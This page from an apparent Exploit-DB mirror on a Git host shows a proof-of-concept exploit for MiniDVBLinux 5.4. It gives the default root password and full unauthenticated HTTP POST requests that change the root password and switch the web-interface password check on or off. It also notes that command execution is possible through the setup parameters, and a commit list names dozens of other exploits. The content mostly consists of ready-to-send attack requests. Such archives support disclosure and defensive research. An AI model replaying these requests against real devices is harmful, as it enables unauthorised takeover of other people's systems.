bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/51094.txt
Exploit-DB b137003172 DB: 2023-03-28 
36 changes to exploits/shellcodes/ghdb

MiniDVBLinux 5.4  - Change Root Password
MiniDVBLinux 5.4  - Remote Root Command Injection
MiniDVBLinux 5.4 - Arbitrary File Read
MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure
MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE)
MiniDVBLinux <=5.4  - Config Download Exploit

Desktop Central 9.1.0 - Multiple Vulnerabilities

FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass
Aero CMS v0.0.1 - PHP Code Injection (auth)
Aero CMS v0.0.1 - SQL Injection (no auth)

Atom CMS v2.0 - SQL Injection (no auth)
Canteen-Management v1.0 - SQL Injection
Canteen-Management v1.0 - XSS-Reflected

Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)

eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)

FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS)

Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)
WebTareas 2.4 - RCE (Authorized)
WebTareas 2.4 - Reflected XSS (Unauthorised)
WebTareas 2.4 - SQL Injection (Unauthorised)

WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities

Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE)

Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass

Grafana <=6.2.4 - HTML Injection

Hex Workshop v6.7 - Buffer overflow DoS

Scdbg 1.0 - Buffer overflow DoS

Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)

AVS Audio Converter 10.3 - Stack Overflow (SEH)

Explorer32++ v1.3.5.531 - Buffer overflow

Frhed (Free hex editor) v1.6.0 - Buffer overflow

Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path

Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path

Resource Hacker v3.6.0.92 - Buffer overflow

Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path

WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)
2023-03-28 00:16:27 +00:00

156 lines
No EOL
5.4 KiB
Text
Raw Permalink Blame History

# Exploit Title: MiniDVBLinux 5.4 - Change Root Password
# Exploit Author: LiquidWorm
MiniDVBLinux 5.4 Change Root Password PoC
Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.
Desc: The application allows a remote attacker to change the root
password of the system without authentication (disabled by default)
and verification of previously assigned credential. Command execution
also possible using several POST parameters.
Tested on: MiniDVBLinux 5.4
BusyBox v1.25.1
Architecture: armhf, armhf-rpi2
GNU/Linux 4.19.127.203 (armv7l)
VideoDiskRecorder 2.4.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5715
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php
24.09.2022
--
Default root password: mld500
Change system password:
-----------------------
POST /?site=setup&section=System HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 778
Content-Type: application/x-www-form-urlencoded
Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba
Host: ip:8008
Origin: http://ip:8008
Referer: http://ip:8008/?site=setup&section=System
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
sec-gpc: 1
APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+
Pretty post data:
APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD: r00t
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Kumanovo
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
action: save
params:
changed: SYSTEM_PASSWORD
Eenable webif password check:
-----------------------------
POST /?site=setup&section=System HTTP/1.1
APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD:
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Berlin
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
WEBIF_PASSWORD_CHECK: 1
action: save
params:
changed: WEBIF_PASSWORD_CHECK
Disable webif password check:
-----------------------------
POST /?site=setup&section=System HTTP/1.1
APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD:
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Berlin
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
action: save
params:
changed: WEBIF_PASSWORD_CHECK
Reference in a new issue View git blame Copy permalink